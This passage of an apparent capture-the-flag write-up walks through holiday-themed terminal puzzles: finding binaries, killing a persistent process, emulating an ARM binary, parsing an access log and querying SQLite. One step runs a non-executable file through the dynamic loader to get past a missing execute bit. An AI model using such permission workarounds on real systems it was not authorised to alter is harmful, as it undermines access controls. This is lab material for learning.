&lt;p&gt;This year’s challenge came as two components: the first is the North Pole and Beyond, a game in which you progress through several levels guiding snowballs through checkpoints and over the pages of the Great Book, and tackle the terminals within those levels to earn achievements; the other is the publicly-exposed Letters to Santa system, and the internal systems behind it, which you must penetrate in order to collect the remaining pages of the Great Book and ultimately try to find out who is responsible for the villain causing the giant snowball problem.&lt;/p&gt;

&lt;p&gt;In this blog post, I shall cover the techniques used to overcome the terminals in the North Pole and Beyond and the acquisition of pages from the Great Book, as well as our journey through the Letters to Santa systems, signposting where we acquire the answers to the nine questions posted on the cha&lt;/p&gt;

&lt;h2 id=&quot;north-pole-and-beyond&quot;&gt;North Pole and Beyond&lt;/h2&gt;

&lt;h3 id=&quot;winter-wonder-landing&quot;&gt;Winter Wonder Landing&lt;/h3&gt;

&lt;h4 id=&quot;great-book-page-1&quot;&gt;Great Book Page 1&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;This is the answer to Question 1: Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The first page of the Great Book could be found inside the Winter Wonder Landing level lying on the floor. By running over it with the snowball and making it to the exit, the page appears in your Stocking with the title “About This Book” (SHA1: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;6dda7650725302f59ea42047206bd4ee5f928d19&lt;/code&gt;).&lt;/p&gt;

&lt;h4 id=&quot;terminal&quot;&gt;Terminal&lt;/h4&gt;

&lt;p&gt;The terminal in this level gives us the following banner&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;                                 |
                               \ ' /
                             -- (*) --
                                &amp;gt;*&amp;lt;
                               &amp;gt;0&amp;lt;@&amp;lt;
                              &amp;gt;&amp;gt;&amp;gt;@&amp;lt;&amp;lt;*
                             &amp;gt;@&amp;gt;*&amp;lt;0&amp;lt;&amp;lt;&amp;lt;
                            &amp;gt;*&amp;gt;&amp;gt;@&amp;lt;&amp;lt;&amp;lt;@&amp;lt;&amp;lt;
                           &amp;gt;@&amp;gt;&amp;gt;0&amp;lt;&amp;lt;&amp;lt;*&amp;lt;&amp;lt;@&amp;lt;
                          &amp;gt;*&amp;gt;&amp;gt;0&amp;lt;&amp;lt;@&amp;lt;&amp;lt;&amp;lt;@&amp;lt;&amp;lt;&amp;lt;
                         &amp;gt;@&amp;gt;&amp;gt;*&amp;lt;&amp;lt;@&amp;lt;&amp;gt;*&amp;lt;&amp;lt;0&amp;lt;*&amp;lt;
           \*/          &amp;gt;0&amp;gt;&amp;gt;*&amp;lt;&amp;lt;@&amp;lt;&amp;gt;0&amp;gt;&amp;lt;&amp;lt;*&amp;lt;@&amp;lt;&amp;lt;
       ___\\U//___     &amp;gt;*&amp;gt;&amp;gt;@&amp;gt;&amp;lt;0&amp;lt;&amp;lt;*&amp;gt;&amp;gt;@&amp;gt;&amp;lt;*&amp;lt;0&amp;lt;&amp;lt;
       |\\ | | \\|    &amp;gt;@&amp;gt;&amp;gt;0&amp;lt;*&amp;lt;0&amp;gt;&amp;gt;@&amp;lt;&amp;lt;0&amp;lt;&amp;lt;&amp;lt;*&amp;lt;@&amp;lt;&amp;lt;  
       | \\| | _(UU)_ &amp;gt;((*))_&amp;gt;0&amp;gt;&amp;lt;*&amp;lt;0&amp;gt;&amp;lt;@&amp;lt;&amp;lt;&amp;lt;0&amp;lt;*&amp;lt;
       |\ \| || / //||.*.*.*.|&amp;gt;&amp;gt;@&amp;lt;&amp;lt;*&amp;lt;&amp;lt;@&amp;gt;&amp;gt;&amp;lt;0&amp;lt;&amp;lt;&amp;lt;
       |\\_|_|&amp;amp;&amp;amp;_// ||*.*.*.*|_\\db//_               
       &quot;&quot;&quot;&quot;|'.'.'.|~~|.*.*.*|     ____|_
           |'.'.'.|   ^^^^^^|____|&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;|
           ~~~~~~~~         '&quot;&quot;&quot;&quot;`------'
My name is Bushy Evergreen, and I have a problem for you.
I think a server got owned, and I can only offer a clue.
We use the system for chat, to keep toy production running.
Can you help us recover from the server connection shunning?


Find and run the elftalkd binary to complete this challenge.
elf@154af25b50a2:~$ 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Attempting to use the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;find&lt;/code&gt; command gives the error &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bash: /usr/local/bin/find: cannot execute binary file: Exec format error&lt;/code&gt; - it looks as though they have placed a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;find&lt;/code&gt; binary for the wrong platform (specifically for ARM, rather than the x86-64 architecture we’re running on) in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/usr/local/bin/&lt;/code&gt; to make our lives a bit more difficult. Thankfully, the correct version of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;find&lt;/code&gt; can still be found at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/usr/bin/find&lt;/code&gt;, and we can use this to locate the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;elftalkd&lt;/code&gt; binary we’re interested in.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@6500a4c0a8ef:~$ /usr/bin/find / -iname elftalkd 2&amp;gt; /dev/null
/run/elftalk/bin/elftalkd
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We can then attempt to run this &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;elftalkd&lt;/code&gt; binary and we are met with success&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@6500a4c0a8ef:~$ /run/elftalk/bin/elftalkd

        Running in interactive mode
        --== Initializing elftalkd ==--

Initializing Messaging System!
Nice-O-Meter configured to 0.90 sensitivity.
Acquiring messages from local networks...


--== Initialization Complete ==--
      _  __ _        _ _       _ 
     | |/ _| |      | | |     | |
  ___| | |_| |_ __ _| | | ____| |
 / _ \ |  _| __/ _` | | |/ / _` |
|  __/ | | | || (_| | |   &amp;lt; (_| |
 \___|_|_|  \__\__,_|_|_|\_\__,_|

-*&amp;gt; elftalkd! &amp;lt;*-
Version 9000.1 (Build 31337) 
By Santa Claus &amp;amp; The Elf Team
Copyright (C) 2017 NotActuallyCopyrighted. No actual rights reserved.
Using libc6 version 2.23-0ubuntu9
LANG=en_US.UTF-8
Timezone=UTC

Commencing Elf Talk Daemon (pid=6021)... done!
Background daemon...
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;winconceivable-the-cliff-of-winsanity&quot;&gt;Winconceivable: The Cliff of Winsanity&lt;/h3&gt;

&lt;h4 id=&quot;terminal-1&quot;&gt;Terminal&lt;/h4&gt;

&lt;p&gt;The terminal in this level gives us the following banner&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;                ___,@
               /  &amp;lt;
          ,_  /    \  _,
      ?    \`/______\`/
   ,_(_).  |; (e  e) ;|
    \___ \ \/\   7  /\/    _\8/_
        \/\   \'=='/      | /| /|
         \ \___)--(_______|//|//|
          \___  ()  _____/|/_|/_|
             /  ()  \    `----'
            /   ()   \
           '-.______.-'
   jgs   _    |_||_|    _
        (@____) || (____@)
         \______||______/


My name is Sparkle Redberry, and I need your help.
My server is atwist, and I fear I may yelp.
Help me kill the troublesome process gone awry.
I will return the favor with a gift before nigh.


Kill the &quot;santaslittlehelperd&quot; process to complete this challenge.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Listing the running processes using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ps aux&lt;/code&gt; gave the following output&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@bf85d7da5620:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
elf          1  0.4  0.0  18028  2824 pts/0    Ss   18:57   0:00 /bin/bash /sbin/init
elf          8  0.0  0.0   4224   632 pts/0    S    18:57   0:00 /usr/bin/santaslittlehelperd
elf         11  2.6  0.0  13528  6328 pts/0    S    18:57   0:00 /sbin/kworker
elf         12  0.0  0.0  18248  3120 pts/0    S    18:57   0:00 /bin/bash
elf         18  8.3  0.1  71468 26520 pts/0    S    18:57   0:00 /sbin/kworker
elf         29  0.0  0.0  34424  2920 pts/0    R+   18:57   0:00 ps aux
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Trying the obvious &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;kill 8&lt;/code&gt; didn’t seem to work - the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;santaslittlehelperd&lt;/code&gt; process was still running. Inspecting the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/sbin/init&lt;/code&gt; script that was run when this container started shows that the program we are trying to kill was started with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nohup&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;disown&lt;/code&gt;, as was another process, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/sbin/kworker&lt;/code&gt;.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;#!/bin/bash
(nohup /usr/bin/santaslittlehelperd &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 &amp;amp; disown)
(sleep 2; nohup /sbin/kworker &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 &amp;amp; disown)
/bin/bash
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;I’m not really sure what trickery was going on here, but invoking &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/bin/kill 8&lt;/code&gt; directly seemed to work (killing the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;kworker&lt;/code&gt; processes too)… ¯\_(ツ)_/¯&lt;/p&gt;

&lt;h3 id=&quot;cryokinetic-magic&quot;&gt;Cryokinetic Magic&lt;/h3&gt;

&lt;h4 id=&quot;terminal-2&quot;&gt;Terminal&lt;/h4&gt;

&lt;p&gt;The terminal in this level gives us the following banner&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;                     ___
                    / __'.     .-&quot;&quot;&quot;-.
              .-&quot;&quot;-| |  '.'.  / .---. \
             / .--. \ \___\ \/ /____| |
            / /    \ `-.-;-(`_)_____.-'._
           ; ;      `.-&quot; &quot;-:_,(o:==..`-. '.         .-&quot;-,
           | |      /       \ /      `\ `. \       / .-. \
           \ \     |         Y    __...\  \ \     / /   \/
     /\     | |    | .--&quot;&quot;--.| .-'      \  '.`---' /
     \ \   / /     |`        \'   _...--.;   '---'`
      \ '-' / jgs  /_..---.._ \ .'\\_     `.
       `--'`      .'    (_)  `'/   (_)     /
                  `._       _.'|         .'
                     ```````    '-...--'`

My name is Holly Evergreen, and I have a conundrum.
I broke the candy cane striper, and I'm near throwing a tantrum.
Assembly lines have stopped since the elves can't get their candy cane fix.
We hope you can start the striper once again, with your vast bag of tricks.


Run the CandyCaneStriper executable to complete this challenge.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Listing the contents of the current directory, we can see the executable we want to run; however, it is owned by root and does not have the executable bit set&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@8285dbdfda37:~$ ls -la
total 68
drwxr-xr-x 1 elf  elf   4096 Dec 15 20:00 .
drwxr-xr-x 1 root root  4096 Dec  5 19:31 ..
-rw-r--r-- 1 elf  elf    220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 root root  3143 Dec 15 19:59 .bashrc
-rw-r--r-- 1 elf  elf    655 May 16  2017 .profile
-rw-r--r-- 1 root root 45224 Dec 15 19:59 CandyCaneStriper
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;One thing we could do, since we can read the contents of the file, is to copy it (the copy would then be owned by us) and use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;chmod&lt;/code&gt; to set the executable flag; however, it looks like the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;chmod&lt;/code&gt; binary itself has been replaced with an empty file!&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@8285dbdfda37:~$ file /bin/chmod
/bin/chmod: empty
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Inspecting the executable file we wish to run using the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;file&lt;/code&gt; command, we see the following&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@8285dbdfda37:~$ file CandyCaneStriper 
CandyCaneStriper: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=bfe4ffd88f30e6970feb7e3341ddbe579e9ab4b3, stripped
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;which is to say that it is a dynamically linked ELF binary, so what we can do is invoke the dynamic linker &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/lib64/ld-linux-x86-64.so.2&lt;/code&gt; directly with the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CandyCaneStriper&lt;/code&gt; binary as its argument; the loader only needs read access to the file it maps, so the missing executable bit does not stop it&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@74db47a71ead:~$ /lib64/ld-linux-x86-64.so.2 ./CandyCaneStriper
                   _..._
                 .'\\ //`,      
                /\\.'``'.=&quot;,
               / \/     ;==|
              /\\/    .'\`,`
             / \/     `&quot;&quot;`
            /\\/
           /\\/
          /\ /
         /\\/
        /`\/
        \\/
         `
The candy cane striping machine is up and running!
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;theres-snow-place-like-home&quot;&gt;There’s Snow Place Like Home&lt;/h3&gt;

&lt;h4 id=&quot;terminal-3&quot;&gt;Terminal&lt;/h4&gt;

&lt;p&gt;The terminal in this level gives us the following banner&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;                             ______
                          .-&quot;&quot;&quot;&quot;.._'.       _,##
                   _..__ |.-&quot;&quot;&quot;-.|  |   _,##'`-._
                  (_____)||_____||  |_,##'`-._,##'`
                  _|   |.;-&quot;&quot;-.  |  |#'`-._,##'`
               _.;_ `--' `\    \ |.'`\._,##'`
              /.-.\ `\     |.-&quot;;.`_, |##'`
              |\__/   | _..;__  |'-' /
              '.____.'_.-`)\--' /'-'`
               //||\\(_.-'_,'-'`
             (`-...-')_,##'`
      jgs _,##`-..,-;##`
       _,##'`-._,##'`
    _,##'`-._,##'`
      `-._,##'`
      
My name is Pepper Minstix, and I need your help with my plight.
I've crashed the Christmas toy train, for which I am quite contrite.
I should not have interfered, hacking it was foolish in hindsight.
If you can get it running again, I will reward you with a gift of delight.


total 444
-rwxr-xr-x 1 root root 454636 Dec  7 18:43 trainstartup
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Attempting to run the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;trainstartup&lt;/code&gt; executable gives us an error, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bash: ./trainstartup: cannot execute binary file: Exec format error&lt;/code&gt;, indicating that this binary is not for this platform.&lt;/p&gt;

&lt;p&gt;Using the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;file&lt;/code&gt; command to find out what platform it &lt;em&gt;is&lt;/em&gt; for shows that it is a 32-bit ARM binary, whereas we are running on a 64-bit x86-64 platform&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@c1db16b4b906:~$ file trainstartup 
trainstartup: ELF 32-bit LSB  executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=005de4685e8563d10b3de3e0be7d6fdd7ed732eb, not stripped
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Thankfully for us, this container ships with QEMU, in particular &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;qemu-arm&lt;/code&gt;, QEMU’s user-mode emulator for ARM, which translates the instructions in our &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;trainstartup&lt;/code&gt; binary for us and allows us to execute it&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@c1db16b4b906:~$ qemu-arm trainstartup 
Starting up ...

    Merry Christmas
    Merry Christmas
v
&amp;gt;*&amp;lt;
^
/o\
/   \               @.·
/~~   \                .
/ ° ~~  \         · .    
/      ~~ \       ◆  ·    
/     °   ~~\    ·     0
/~~           \   .─··─ · o
             /°  ~~  .*· · . \  ├──┼──┤                                        
              │  ──┬─°─┬─°─°─°─ └──┴──┘                                        
≠==≠==≠==≠==──┼──=≠     ≠=≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠===≠
              │   /└───┘\┌───┐       ┌┐                                        
                         └───┘    /▒▒▒▒                                        
≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠=°≠=°≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠




You did it! Thank you!
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;bumbles-bounce&quot;&gt;Bumbles Bounce&lt;/h3&gt;

&lt;h4 id=&quot;great-book-page-5&quot;&gt;Great Book page 5&lt;/h4&gt;

&lt;p&gt;This level contains another page from the Great Book which can be acquired by rolling over it with a snowball and reaching the exit. This is page 5, entitled “The Abominable Snow Monster” (SHA1: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;05c0cacc8cfb96bb5531540e9b2b839a0604225f&lt;/code&gt;)&lt;/p&gt;

&lt;h4 id=&quot;terminal-4&quot;&gt;Terminal&lt;/h4&gt;

&lt;p&gt;The terminal in this level gives us the following banner&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;      ''   /o\   ''     '.|  |.'      \/ //&amp;gt;&amp;lt;\\ \/
           ':'        . ~~\  /~~ .       _//\\_
jgs                   _\_._\/_._/_      \_\  /_/ 
                       / ' /\ ' \                   \o/
       o              ' __/  \__ '              _o/.:|:.\o_
  o    :    o         ' .'|  |'.                  .\:|:/.
    '.\'/.'                 .                 -=&amp;gt;&amp;gt;::&amp;gt;o&amp;lt;::&amp;lt;&amp;lt;=-
    :-&amp;gt;@&amp;lt;-:                 :                   _ '/:|:\' _
    .'/.\'.           '.___/*\___.'              o\':|:'/o 
  o    :    o           \* \ / */                   /o\
       o                 &amp;gt;--X--&amp;lt;
                        /*_/ \_*\
                      .'   \*/   '.
                            :
                            '
Minty Candycane here, I need your help straight away.
We're having an argument about browser popularity stray.
Use the supplied log file from our server in the North Pole.
Identifying the least-popular browser is your noteworthy goal.
total 28704
-rw-r--r-- 1 root root 24191488 Dec  4 17:11 access.log
-rwxr-xr-x 1 root root  5197336 Dec 11 17:31 runtoanswer
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;This one was just a bit of trial and error with our usual go-to command line tools for manipulating text-based data, namely &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cut&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sort&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;uniq&lt;/code&gt;. Splitting each line on double quotes, the sixth field of the usual “combined” access log format is the User-Agent string, so counting those and sorting by count puts the rarest browsers last&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@15b12bd7b9ec:~$ cut -d '&quot;' -f 6 access.log | sort | uniq -c | sort -nr | tail
      1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; MASMJS)
      1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
      1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
      1 Mozilla/5.0 (X11; OpenBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36
      1 Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
      1 Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
      1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
      1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko)
      1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
      1 Dillo/3.0.5
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We try to answer with “Dillo”, and this turns out to be the correct answer&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@15b12bd7b9ec:~$ ./runtoanswer 
Starting up, please wait......
Enter the name of the least popular browser in the web log: Dillo
That is the least common browser in the web log! Congratulations!
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
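&lt;p&gt;The cut pipeline above relies on the User-Agent being the sixth double-quote-delimited field, which stops holding the moment a request line contains a backslash-escaped quote. As an added example that is not part of the original write-up, the Python below parses the combined log format properly and runs the same least-common-agent count over a few constructed log lines (not the challenge’s access.log), with the naive field split alongside for comparison.&lt;/p&gt;

```python
import re
from collections import Counter

# The "combined" access log format. Quoted fields may contain backslash-escaped
# double quotes (\"); a plain cut -d '"' -f 6 does not know that and shifts
# every later field by one on such lines.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(
    r'^(\S+) (\S+) (\S+) \[([^\]]+)\] '   # client, identd, user, timestamp
    + QUOTED + r' (\d{3}) (\S+) '          # request, status, bytes
    + QUOTED + r' ' + QUOTED + r'\s*$'     # referer, user agent
)

# Constructed sample lines; not taken from the challenge's access.log.
SAMPLE_LOG = [
    '10.1.1.5 - - [04/Dec/2017:17:11:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"',
    '10.1.1.5 - - [04/Dec/2017:17:11:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"',
    # Escaped quote inside the request line: the case that breaks cut -f 6.
    '10.1.1.9 - - [04/Dec/2017:17:12:40 +0000] "GET /search?q=\\"x HTTP/1.1" 404 209 "-" '
    '"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1"',
    # Client sent no User-Agent header at all.
    '10.1.1.7 - - [04/Dec/2017:17:13:00 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "-"',
    '10.1.1.8 - - [04/Dec/2017:17:14:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Dillo/3.0.5"',
    'garbage line that is not a log entry',
]

def parse_line(line):
    """Return (request, status, referer, agent), or None if the line does not parse."""
    m = COMBINED_RE.match(line)
    if m is None:
        return None
    _, _, _, _, request, status, _, referer, agent = m.groups()
    return request, int(status), referer, agent

def agent_counts(lines):
    """Count user agents; skip unparseable lines and '-' (header absent)."""
    counts = Counter()
    skipped = 0
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            skipped += 1
            continue
        agent = parsed[3]
        if agent != "-":
            counts[agent] += 1
    return counts, skipped

def least_common(lines, n=1):
    """The n rarest agents as (agent, count), ties broken alphabetically."""
    counts, _ = agent_counts(lines)
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))[:n]

def naive_cut_field6(line):
    """What cut -d '"' -f 6 returns for a line, for comparison."""
    parts = line.split('"')
    try:
        return parts[5]
    except IndexError:
        return ""

if __name__ == "__main__":
    print("rarest agent:", least_common(SAMPLE_LOG))
    print("cut -f 6 on the escaped-quote line:", repr(naive_cut_field6(SAMPLE_LOG[2])))
```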

&lt;h3 id=&quot;i-dont-think-were-in-kansas-anymore&quot;&gt;I Don’t Think We’re In Kansas Anymore&lt;/h3&gt;

&lt;h4 id=&quot;terminal-5&quot;&gt;Terminal&lt;/h4&gt;

&lt;p&gt;The terminal in this level gives us the following banner&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;                       *
                      .~'
                     O'~..
                    ~'O'~..
                   ~'O'~..~'
                  O'~..~'O'~.
                 .~'O'~..~'O'~
                ..~'O'~..~'O'~.
               .~'O'~..~'O'~..~'
              O'~..~'O'~..~'O'~..
             ~'O'~..~'O'~..~'O'~..
            ~'O'~..~'O'~..~'O'~..~'
           O'~..~'O'~..~'O'~..~'O'~.
          .~'O'~..~'O'~..~'O'~..~'O'~
         ..~'O'~..~'O'~..~'O'~..~'O'~.
        .~'O'~..~'O'~..~'O'~..~'O'~..~'
       O'~..~'O'~..~'O'~..~'O'~..~'O'~..
      ~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..
     ~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'
    O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~.
   .~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~
  ..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~.
 .~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'
O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..
Sugarplum Mary is in a tizzy, we hope you can assist.
Christmas songs abound, with many likes in our midst.
The database is populated, ready for you to address.
Identify the song whose popularity is the best.


total 20684
-rw-r--r-- 1 root root 15982592 Nov 29 19:28 christmassongs.db
-rwxr-xr-x 1 root root  5197352 Dec  7 15:10 runtoanswer
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We don’t have the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;file&lt;/code&gt; command at our disposal to tell us what type of database &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;christmassongs.db&lt;/code&gt; is, but searching for a few obvious candidates for command line clients, we discover that &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sqlite3&lt;/code&gt; is installed, so this is probably a SQLite database. Using this, we can list the tables, examine the schemas, and craft a query to get us the information we need.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@7fad6ef31c2a:~$ sqlite3 christmassongs.db
SQLite version 3.11.0 2016-02-15 17:29:24
Enter &quot;.help&quot; for usage hints.
sqlite&amp;gt; .tables
likes  songs
sqlite&amp;gt; .schema songs
CREATE TABLE songs(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  title TEXT,
  artist TEXT,
  year TEXT,
  notes TEXT
);
sqlite&amp;gt; .schema likes
